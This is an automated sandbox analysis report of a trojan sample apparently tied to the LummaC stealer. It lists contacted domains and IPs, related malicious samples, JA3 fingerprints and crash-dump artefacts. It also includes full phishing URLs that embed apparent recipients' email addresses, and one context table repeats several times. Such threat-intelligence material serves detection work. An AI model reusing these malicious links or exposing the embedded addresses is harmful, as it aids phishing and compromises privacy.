104.21.30.221	ehticsprocw.sbs	United States	13335	CLOUDFLARENETUS	true
172.67.141.136	condifendteu.sbs	United States	13335	CLOUDFLARENETUS	true
104.102.49.254	steamcommunity.com	United States	16625	AKAMAI-ASUS	true
104.21.28.222	passimovrt.cfd	United States	13335	CLOUDFLARENETUS	true
172.67.205.156	resinedyw.sbs	United States	13335	CLOUDFLARENETUS	true
104.21.46.170	vennurviot.sbs	United States	13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1532889
Start date and time:	2024-10-14 05:00:08 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 14s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	SoftWare(1).exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@5/7@11/9
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 93% Number of executed functions: 24 Number of non-executed functions: 102
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 52.168.117.173
Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
23:01:02	API Interceptor	4x Sleep call for process: aspnet_regiis.exe modified
23:01:28	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.53.8	file.exe	Get hash	malicious	LummaC	Browse
	SecuriteInfo.com.Win32.Evo-gen.11764.10915.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC	Browse
	SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC	Browse
	Set-up.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC	Browse
188.114.96.3	DRAFT DOC2406656.bat.exe	Get hash	malicious	Lokibot	Browse	touxzw.ir/sirr/five/fre.php
	lv961v43L3.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	863811cm.nyafka.top/video_RequestpacketUpdategeneratorPublic.php
	10092024150836 09.10.2024.vbe	Get hash	malicious	FormBook	Browse	www.airgame.store/ojib/
	Hesap-hareketleriniz.exe	Get hash	malicious	FormBook	Browse	www.cc101.pro/59fb/
	octux.exe.exe	Get hash	malicious	Unknown	Browse	servicetelemetryserver.shop/api/index.php
	bX8NyyjOFz.exe	Get hash	malicious	FormBook	Browse	www.rtprajalojago.live/2uvi/
	lWfpGAu3ao.exe	Get hash	malicious	FormBook	Browse	www.serverplay.live/71nl/
	sa7Bw41TUq.exe	Get hash	malicious	FormBook	Browse	www.cc101.pro/0r21/
	E_receipt.vbs	Get hash	malicious	Unknown	Browse	paste.ee/d/VO2TX
	QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	filetransfer.io/data-package/fOmsJ2bL/download

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
drawwyobstacw.sbs	Setup.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	Setup.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	Set-up.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	WxmEM5HgjY.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	Setup.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	Setup-Premium.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	Solara.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	Loader.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	Wintohdd.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	670937a58778f_LisioFirendes.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
condifendteu.sbs	Setup.exe	Get hash	malicious	LummaC	Browse	104.21.79.35
	Setup.exe	Get hash	malicious	LummaC	Browse	104.21.79.35
	Set-up.exe	Get hash	malicious	LummaC	Browse	172.67.141.136
	WxmEM5HgjY.exe	Get hash	malicious	LummaC	Browse	172.67.141.136
	Setup.exe	Get hash	malicious	LummaC	Browse	104.21.79.35
	Setup-Premium.exe	Get hash	malicious	LummaC	Browse	104.21.79.35
	Solara.exe	Get hash	malicious	LummaC	Browse	172.67.141.136
	Loader.exe	Get hash	malicious	LummaC	Browse	104.21.79.35
	Wintohdd.exe	Get hash	malicious	LummaC	Browse	172.67.141.136
	670937a58778f_LisioFirendes.exe	Get hash	malicious	LummaC	Browse	104.21.79.35
vennurviot.sbs	Setup.exe	Get hash	malicious	LummaC	Browse	172.67.140.193
	Setup.exe	Get hash	malicious	LummaC	Browse	172.67.140.193
	Set-up.exe	Get hash	malicious	LummaC	Browse	172.67.140.193
	WxmEM5HgjY.exe	Get hash	malicious	LummaC	Browse	104.21.46.170
	Setup.exe	Get hash	malicious	LummaC	Browse	172.67.140.193
	Setup-Premium.exe	Get hash	malicious	LummaC	Browse	172.67.140.193
	Solara.exe	Get hash	malicious	LummaC	Browse	172.67.140.193
	Loader.exe	Get hash	malicious	LummaC	Browse	172.67.140.193
	Wintohdd.exe	Get hash	malicious	LummaC	Browse	172.67.140.193
	670937a58778f_LisioFirendes.exe	Get hash	malicious	LummaC	Browse	172.67.140.193
steamcommunity.com	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	SecuriteInfo.com.Win32.Evo-gen.15503.22039.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	SecuriteInfo.com.Win32.Evo-gen.11764.10915.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
mathcucom.sbs	Setup.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	Setup.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	Set-up.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	WxmEM5HgjY.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	Setup.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	Setup-Premium.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	Solara.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	Loader.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	Wintohdd.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	670937a58778f_LisioFirendes.exe	Get hash	malicious	LummaC	Browse	188.114.96.3

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	Compliance_Report_Final_Q3_8c3f5541a91374b5bf18ac88017a597742a1891a.html	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://aa.ns.agingbydesignministry.org/?company=john_smith@company.com/1/01020192845e78dd-2d6e57c1-2477-4368-9808-e405234d7366-000000/JciFxQG6yOVw83-lKIliC63cjw4=395	Get hash	malicious	HTMLPhisher	Browse	1.1.1.1
	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	rPayment_slip.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8
	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	https://60ms64xz.r.eu-west-1.awstrack.me/L0/https:%2F%2Fnym1-ib.adnxs.com%2Fclick2%3Fe=wqT_3QKhAfCBoQAAAAMAxBkFAQj1xf22BhCN5rHDq8rIsXYY6OvVqs3R1c9aIPXtswsoykEwhx04AkDV-qXwAUiY1VJQAFoDVVNEYgNVU0RorAJw-gF4kfdrgAG5zAOIAQGQAQGYAQWgAQKpAVM7_DVZo44_sQHWE0zrJXyFP7kBAAAAwMzM7D_BAREUDMkBUDsJKDDYAQDgAQDwAdEO-AEA%2Fs=555aa6e5683ce51c048a98b83e6a923b5a8d9a2c%2Fbcr=AAAAAAAA8D8=%2Fcnd=%25218hVjbgiv18IdENX6pfABGJjVUiAAKAAxmpmZmZmZuT86CU5ZTTI6NTI1NECoR0kAAAAAAADwP1EAAAAAAAAAAFkAAAAAAAAAAGEAAAAAAAAAAGkAAAAAAAAAAHEAAAAAAAAAAHgAiQEAAAAAAADwPw..%2Fcca=MzcxOSNOWU0yOjUyNTQ=%2Fbn=58937%2Fclickenc=http%253A%252F%252Faa.ns.agingbydesignministry.org%3FMlcinsurance=grant.harpur@mlcinsurance.com.au/1/0102019284444055-c8ec5399-450a-413f-acab-546e07ef32e7-000000/Qxx4uNY6H1RoEfFUkvzFba2SPik=395	Get hash	malicious	HTMLPhisher	Browse	1.1.1.1
	http://painel.simpatiafm.com.br/	Get hash	malicious	Unknown	Browse	162.247.243.29
	SecuriteInfo.com.Win32.Trojan.Agent.1MWNV4.31044.30727.exe	Get hash	malicious	Unknown	Browse	104.20.86.8
CLOUDFLARENETUS	Compliance_Report_Final_Q3_8c3f5541a91374b5bf18ac88017a597742a1891a.html	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://aa.ns.agingbydesignministry.org/?company=john_smith@company.com/1/01020192845e78dd-2d6e57c1-2477-4368-9808-e405234d7366-000000/JciFxQG6yOVw83-lKIliC63cjw4=395	Get hash	malicious	HTMLPhisher	Browse	1.1.1.1
	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	rPayment_slip.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8
	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	https://60ms64xz.r.eu-west-1.awstrack.me/L0/https:%2F%2Fnym1-ib.adnxs.com%2Fclick2%3Fe=wqT_3QKhAfCBoQAAAAMAxBkFAQj1xf22BhCN5rHDq8rIsXYY6OvVqs3R1c9aIPXtswsoykEwhx04AkDV-qXwAUiY1VJQAFoDVVNEYgNVU0RorAJw-gF4kfdrgAG5zAOIAQGQAQGYAQWgAQKpAVM7_DVZo44_sQHWE0zrJXyFP7kBAAAAwMzM7D_BAREUDMkBUDsJKDDYAQDgAQDwAdEO-AEA%2Fs=555aa6e5683ce51c048a98b83e6a923b5a8d9a2c%2Fbcr=AAAAAAAA8D8=%2Fcnd=%25218hVjbgiv18IdENX6pfABGJjVUiAAKAAxmpmZmZmZuT86CU5ZTTI6NTI1NECoR0kAAAAAAADwP1EAAAAAAAAAAFkAAAAAAAAAAGEAAAAAAAAAAGkAAAAAAAAAAHEAAAAAAAAAAHgAiQEAAAAAAADwPw..%2Fcca=MzcxOSNOWU0yOjUyNTQ=%2Fbn=58937%2Fclickenc=http%253A%252F%252Faa.ns.agingbydesignministry.org%3FMlcinsurance=grant.harpur@mlcinsurance.com.au/1/0102019284444055-c8ec5399-450a-413f-acab-546e07ef32e7-000000/Qxx4uNY6H1RoEfFUkvzFba2SPik=395	Get hash	malicious	HTMLPhisher	Browse	1.1.1.1
	http://painel.simpatiafm.com.br/	Get hash	malicious	Unknown	Browse	162.247.243.29
	SecuriteInfo.com.Win32.Trojan.Agent.1MWNV4.31044.30727.exe	Get hash	malicious	Unknown	Browse	104.20.86.8
CLOUDFLARENETUS	Compliance_Report_Final_Q3_8c3f5541a91374b5bf18ac88017a597742a1891a.html	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://aa.ns.agingbydesignministry.org/?company=john_smith@company.com/1/01020192845e78dd-2d6e57c1-2477-4368-9808-e405234d7366-000000/JciFxQG6yOVw83-lKIliC63cjw4=395	Get hash	malicious	HTMLPhisher	Browse	1.1.1.1
	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	rPayment_slip.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8
	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	https://60ms64xz.r.eu-west-1.awstrack.me/L0/https:%2F%2Fnym1-ib.adnxs.com%2Fclick2%3Fe=wqT_3QKhAfCBoQAAAAMAxBkFAQj1xf22BhCN5rHDq8rIsXYY6OvVqs3R1c9aIPXtswsoykEwhx04AkDV-qXwAUiY1VJQAFoDVVNEYgNVU0RorAJw-gF4kfdrgAG5zAOIAQGQAQGYAQWgAQKpAVM7_DVZo44_sQHWE0zrJXyFP7kBAAAAwMzM7D_BAREUDMkBUDsJKDDYAQDgAQDwAdEO-AEA%2Fs=555aa6e5683ce51c048a98b83e6a923b5a8d9a2c%2Fbcr=AAAAAAAA8D8=%2Fcnd=%25218hVjbgiv18IdENX6pfABGJjVUiAAKAAxmpmZmZmZuT86CU5ZTTI6NTI1NECoR0kAAAAAAADwP1EAAAAAAAAAAFkAAAAAAAAAAGEAAAAAAAAAAGkAAAAAAAAAAHEAAAAAAAAAAHgAiQEAAAAAAADwPw..%2Fcca=MzcxOSNOWU0yOjUyNTQ=%2Fbn=58937%2Fclickenc=http%253A%252F%252Faa.ns.agingbydesignministry.org%3FMlcinsurance=grant.harpur@mlcinsurance.com.au/1/0102019284444055-c8ec5399-450a-413f-acab-546e07ef32e7-000000/Qxx4uNY6H1RoEfFUkvzFba2SPik=395	Get hash	malicious	HTMLPhisher	Browse	1.1.1.1
	http://painel.simpatiafm.com.br/	Get hash	malicious	Unknown	Browse	162.247.243.29
	SecuriteInfo.com.Win32.Trojan.Agent.1MWNV4.31044.30727.exe	Get hash	malicious	Unknown	Browse	104.20.86.8
CLOUDFLARENETUS	Compliance_Report_Final_Q3_8c3f5541a91374b5bf18ac88017a597742a1891a.html	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://aa.ns.agingbydesignministry.org/?company=john_smith@company.com/1/01020192845e78dd-2d6e57c1-2477-4368-9808-e405234d7366-000000/JciFxQG6yOVw83-lKIliC63cjw4=395	Get hash	malicious	HTMLPhisher	Browse	1.1.1.1
	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	rPayment_slip.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8
	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	https://60ms64xz.r.eu-west-1.awstrack.me/L0/https:%2F%2Fnym1-ib.adnxs.com%2Fclick2%3Fe=wqT_3QKhAfCBoQAAAAMAxBkFAQj1xf22BhCN5rHDq8rIsXYY6OvVqs3R1c9aIPXtswsoykEwhx04AkDV-qXwAUiY1VJQAFoDVVNEYgNVU0RorAJw-gF4kfdrgAG5zAOIAQGQAQGYAQWgAQKpAVM7_DVZo44_sQHWE0zrJXyFP7kBAAAAwMzM7D_BAREUDMkBUDsJKDDYAQDgAQDwAdEO-AEA%2Fs=555aa6e5683ce51c048a98b83e6a923b5a8d9a2c%2Fbcr=AAAAAAAA8D8=%2Fcnd=%25218hVjbgiv18IdENX6pfABGJjVUiAAKAAxmpmZmZmZuT86CU5ZTTI6NTI1NECoR0kAAAAAAADwP1EAAAAAAAAAAFkAAAAAAAAAAGEAAAAAAAAAAGkAAAAAAAAAAHEAAAAAAAAAAHgAiQEAAAAAAADwPw..%2Fcca=MzcxOSNOWU0yOjUyNTQ=%2Fbn=58937%2Fclickenc=http%253A%252F%252Faa.ns.agingbydesignministry.org%3FMlcinsurance=grant.harpur@mlcinsurance.com.au/1/0102019284444055-c8ec5399-450a-413f-acab-546e07ef32e7-000000/Qxx4uNY6H1RoEfFUkvzFba2SPik=395	Get hash	malicious	HTMLPhisher	Browse	1.1.1.1
	http://painel.simpatiafm.com.br/	Get hash	malicious	Unknown	Browse	162.247.243.29
	SecuriteInfo.com.Win32.Trojan.Agent.1MWNV4.31044.30727.exe	Get hash	malicious	Unknown	Browse	104.20.86.8
CLOUDFLARENETUS	Compliance_Report_Final_Q3_8c3f5541a91374b5bf18ac88017a597742a1891a.html	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://aa.ns.agingbydesignministry.org/?company=john_smith@company.com/1/01020192845e78dd-2d6e57c1-2477-4368-9808-e405234d7366-000000/JciFxQG6yOVw83-lKIliC63cjw4=395	Get hash	malicious	HTMLPhisher	Browse	1.1.1.1
	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	rPayment_slip.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8
	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	https://60ms64xz.r.eu-west-1.awstrack.me/L0/https:%2F%2Fnym1-ib.adnxs.com%2Fclick2%3Fe=wqT_3QKhAfCBoQAAAAMAxBkFAQj1xf22BhCN5rHDq8rIsXYY6OvVqs3R1c9aIPXtswsoykEwhx04AkDV-qXwAUiY1VJQAFoDVVNEYgNVU0RorAJw-gF4kfdrgAG5zAOIAQGQAQGYAQWgAQKpAVM7_DVZo44_sQHWE0zrJXyFP7kBAAAAwMzM7D_BAREUDMkBUDsJKDDYAQDgAQDwAdEO-AEA%2Fs=555aa6e5683ce51c048a98b83e6a923b5a8d9a2c%2Fbcr=AAAAAAAA8D8=%2Fcnd=%25218hVjbgiv18IdENX6pfABGJjVUiAAKAAxmpmZmZmZuT86CU5ZTTI6NTI1NECoR0kAAAAAAADwP1EAAAAAAAAAAFkAAAAAAAAAAGEAAAAAAAAAAGkAAAAAAAAAAHEAAAAAAAAAAHgAiQEAAAAAAADwPw..%2Fcca=MzcxOSNOWU0yOjUyNTQ=%2Fbn=58937%2Fclickenc=http%253A%252F%252Faa.ns.agingbydesignministry.org%3FMlcinsurance=grant.harpur@mlcinsurance.com.au/1/0102019284444055-c8ec5399-450a-413f-acab-546e07ef32e7-000000/Qxx4uNY6H1RoEfFUkvzFba2SPik=395	Get hash	malicious	HTMLPhisher	Browse	1.1.1.1
	http://painel.simpatiafm.com.br/	Get hash	malicious	Unknown	Browse	162.247.243.29
	SecuriteInfo.com.Win32.Trojan.Agent.1MWNV4.31044.30727.exe	Get hash	malicious	Unknown	Browse	104.20.86.8

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8 188.114.96.3 172.67.152.13 104.21.30.221 172.67.141.136 104.102.49.254 104.21.28.222 172.67.205.156 104.21.46.170
	FACTURA.cmd	Get hash	malicious	DBatLoader	Browse	104.21.53.8 188.114.96.3 172.67.152.13 104.21.30.221 172.67.141.136 104.102.49.254 104.21.28.222 172.67.205.156 104.21.46.170
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8 188.114.96.3 172.67.152.13 104.21.30.221 172.67.141.136 104.102.49.254 104.21.28.222 172.67.205.156 104.21.46.170
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8 188.114.96.3 172.67.152.13 104.21.30.221 172.67.141.136 104.102.49.254 104.21.28.222 172.67.205.156 104.21.46.170
	20Listen.eml	Get hash	malicious	HTMLPhisher	Browse	104.21.53.8 188.114.96.3 172.67.152.13 104.21.30.221 172.67.141.136 104.102.49.254 104.21.28.222 172.67.205.156 104.21.46.170
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8 188.114.96.3 172.67.152.13 104.21.30.221 172.67.141.136 104.102.49.254 104.21.28.222 172.67.205.156 104.21.46.170
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8 188.114.96.3 172.67.152.13 104.21.30.221 172.67.141.136 104.102.49.254 104.21.28.222 172.67.205.156 104.21.46.170
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8 188.114.96.3 172.67.152.13 104.21.30.221 172.67.141.136 104.102.49.254 104.21.28.222 172.67.205.156 104.21.46.170
	SecuriteInfo.com.Win32.Evo-gen.15503.22039.exe	Get hash	malicious	LummaC	Browse	104.21.53.8 188.114.96.3 172.67.152.13 104.21.30.221 172.67.141.136 104.102.49.254 104.21.28.222 172.67.205.156 104.21.46.170
	SecuriteInfo.com.Win32.Evo-gen.11764.10915.exe	Get hash	malicious	LummaC	Browse	104.21.53.8 188.114.96.3 172.67.152.13 104.21.30.221 172.67.141.136 104.102.49.254 104.21.28.222 172.67.205.156 104.21.46.170

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_aspnet_regiis.ex_90207b4b93c0fbe6f8caeaf6efed237ac9f15ca0_d8295a56_b82e07be-d2da-420e-ab35-b2749b42adf7\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.1027660022791612
Encrypted:	false
SSDEEP:	192:PK2NTP1il0BU/4jGmDEDHxzuiFUZ24IO8C3:HJiGBU/4jxQxzuiFUY4IO8C3
MD5:	28B7E1CA584575750BDA56B7C9360468
SHA1:	601EDE8BA8DDD851E82A685EF32C9BCE1C000033
SHA-256:	B1F73C39B5E122CD2C38D65E5B8031535D5BA577AB8E15D56834CCC21114C3DF
SHA-512:	A68EF06ABA1E18C6F6BBF02E250E6DA70125D96B5DFAFA5804AEDC47717F8D5E68C1CB9A59F2C59A5A1D5C6AE843443C305DFE2D42BA3080F6766DF4FA9858C3
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.3.3.4.8.4.7.2.9.3.5.2.5.9.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.3.3.4.8.4.7.3.8.5.7.1.2.3.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.8.2.e.0.7.b.e.-.d.2.d.a.-.4.2.0.e.-.a.b.3.5.-.b.2.7.4.9.b.4.2.a.d.f.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.8.1.a.d.8.0.9.-.c.0.c.0.-.4.e.1.f.-.a.4.7.4.-.f.9.c.f.9.c.5.b.d.a.3.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.a.s.p.n.e.t._.r.e.g.i.i.s...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.a.s.p.n.e.t._.r.e.g.i.i.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.1.1.8.-.0.0.0.1.-.0.0.1.4.-.4.3.4.c.-.3.8.4.c.e.5.1.d.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.c.5.5.8.f.0.e.8.4.2.c.4.3.e.6.b.3.b.c.0.6.6.9.1.6.b.2.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER860B.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Mon Oct 14 03:01:13 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	116178
Entropy (8bit):	2.1271325999158908
Encrypted:	false
SSDEEP:	384:5XPjnkQH8kB7FxHssR1pGIm3BerwCR5lBqhKWZ60KUkJB7S0:5rkq8kB7HHssR7rm3ErmZmtJ00
MD5:	BCFF99A40088882398D771769ADC04BD
SHA1:	198D6609C10BA568265583BD470258145F6D6A03
SHA-256:	F59A468DD20146B69B7447BA441012BAAC25C1639868807C9949E7D732EB23DC
SHA-512:	703BD2367C1BCA6CCD59E0737CB2DEAF69332D48AAD681C6BCE1D16352474B7F658E638F928589388415D6F666E3CCB8001182B1C4632F285961AE49018CF26F
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... .......y..g.........................................!..........DJ..........`.......8...........T...........H@..............4".......... $..............................................................................eJ.......$......GenuineIntel............T...........l..g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER88EB.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8314
Entropy (8bit):	3.688748661824445
Encrypted:	false
SSDEEP:	192:R6l7wVeJia6d6YYV6tgmfvPprU89baQsfxem:R6lXJH6d6YC6tgmfvjajfx
MD5:	A4F6D76E811215507E029725C2B41334
SHA1:	AC74F1CC95C7F7E3DE0AAB92F749193884AC56BF
SHA-256:	D7F1342E6AA35D60F68056C9BA1156813210ADB10C842648C0D449CC36575460
SHA-512:	040B5ECFB5831C8362FE8838435980B954C48E2F839CEB2F84CD7B6F81D038ADF8881C2305F71BF61B2A787A34CDD71BC26D4B8207A0B44B7B854EAACAB3375D
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.8.0.<./.P.i.d.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER892A.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4683
Entropy (8bit):	4.459818688627694
Encrypted:	false
SSDEEP:	48:cvIwWl8zs1Jg77aI9XsWpW8VYlYm8M4Jhofo6FN+q8bsXaeSararMd:uIjfPI71F7VJJh0pgsLSararMd
MD5:	5207418D1D894AF20F263ADD9D11DA2E
SHA1:	8B45ADAD40348817768B21DE7D2D2AC7588AC95D
SHA-256:	46FB293A260BB9A6C490DDE107FBF0685F369AC48C6897A9EDDC82B6DDD2B419
SHA-512:	C897BDA03BB212886F2AA593CED487717517F3A8049E496B64001CAB7956E4A5D3FAE25FFB5C0A073BF4B08B8869A5EA3415ED3594C7621AF1A87699126C01AF
Malicious:	false
Reputation:	low
